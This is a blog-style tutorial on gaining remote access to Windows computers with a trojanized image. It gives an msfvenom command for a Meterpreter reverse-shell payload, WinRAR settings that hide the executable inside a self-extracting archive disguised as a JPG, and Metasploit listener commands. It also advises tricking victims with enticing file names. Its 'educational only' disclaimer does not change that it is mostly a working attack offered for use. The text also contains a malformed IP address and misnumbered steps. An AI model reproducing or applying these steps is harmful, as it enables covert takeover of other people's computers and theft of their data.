Today we will learn how to hack windows with an image manually with Metasploit and WinRAR. I know from the name the hack might seem difficult but in reality, hacking windows with an image is very easy and straight forward. seeing how dangerous it is. Anyone with a computer can do it. This hack is pretty easy to understand and can show how vulnerable windows os truly is. So without further ado, let’s start hacking windows.
This hack will be done in 3 parts:
- Create a Metasploit Payload for hacking windows
- Inject that Payload to an Image
- Start your listener to intercept the remote connection
Requirements for this hack
- Kali Linux OS
- Windows System for merging the virus with an image
- Image File with .jpg extension (Any image is fine)
- Winrar installed on the windows system
You might like: Hacking wifi with windows
1: Create a Metasploit payload:
Step 1: To make the Metasploit Payload
Open a Kali Linux terminal.
Step 2: Now type the following command to create a reverse shell payload.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.174.132 LPORT=4444 -f exe -o virus.exe
Make sure to change the LHOST to your local IP address.
Use ifconfig in Linux to check your IP.
Step 3: Once you have created the virus, copy it to your windows machine. For Vmware direct copy-paste works just as well. Note this file is a remote access virus.
2. Bind Payload to an Image to make a Malicious image.
Step 1: On your Windows system copy the file to the desktop
Step 2: Download any image from the internet and save it on your desktop. We will call it Imagehack.jpg
Step 3: Now make a .ico (icon) file from the .jpg image. Use the website icoconvert for making the .ico file from the jpg file as shown.
Step 4: Collect all the three files virus.exe, imagehack.jpg & imagehack.ico in the same folder.
Step 5: Now select the file imagehack.jpg and virus.exe, right-click and select the option “Add to archive”. This option is added by WinRAR. You need WinRAR installed for this hack to work as intended.
Step 6: In the Archive option, You need to select the following settings:
- Compression method to best
- Create SFX archive
- Archive format as rar
Step 7: Now, once the general settings are set. Click on the Advanced tab, click on SFX options and click OK.
Step 8: Now in the SFX options tab, click on the update tab and select the following settings
- Extract and update
- Overwrite all files
Step 9: Now select the setup tab and make sure you can see the following in the same order:
The order is important because the first imagehack.jpg will open and then our Payload file, i.e. virus.exe, will be executed in the background.
Step 8: From the Text and Icon tab and select the icon file you created and load it to SFX icon from file set as shown
Step 9: Now navigate to modes tab and click on Hide all as shown in the image below:
Step 10: Now click on OK and the malicious Image will be created. This malicious file can be used to hack any windows device with an image.
Step 11: Now, you need to send this file to the target. Before that, let’s get our listener started on our end.
3. Starting your Listener in Kali Linux for reverse shell
Step 1: Open a Kali Linux terminal and type the following to open Metasploit
Step 2: Now type the following commands in order to start the listener in Metasploit
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.192.174.132
set LPORT 4444
Make sure you use the correct LHOST and LPORT settings as you did while creating the virus file.
Step 3: Now, once everything is set as needed, Execute the listener:
Step 4: Now, you need to use social engineering to send the file to the target victim. Make sure to use convincing images and names. Using the name imagehack as I did will not make the target click the victim. Hot girl or funny pic would be better named for the files.
As soon as target opes the file, the virus will be executed, and an image will be shown to the target who will think nothing is wrong. But we just got a reverse shell to the target.
Step 7: As you can see, I got a reverse shell on Metasploit. Type help to see the list of commands you can use.
Must read: How to hack routers with routersploit
Commonly asked questions about hacking windows with an Image:
Q1 Is hacking windows 10 devices legal?
No, hacking windows 10 is not legal. This post is an educational post to show how hackers can hack windows with an Image.
Q2 The Malicious Image file I made is detected as a virus by antivirus. What do I do?
Do not worry; you are safe. The alert is because you made your own virus, which is hidden in the image file. The antivirus software might detect the virus. Which only means you have a great antivirus.
Q3. How can hack my friends or girlfriends pc with this hack?
This hack is only for educational purposes, not for hacking people. We do not support any illegal hacking. Kindly refrain from such comments and requests.
Q4. Does this hack work on all versions of Windows?
Yes, it does work on all versions of windows; however, updated windows might detect it as a virus. An antivirus will definitely detect it as a virus.
Q.5 How can I can perform this hack over the internet?
Hope you liked this article and you learned how to hack windows with an image. Donate to support. Keep sharing the articles. Happy Hacking.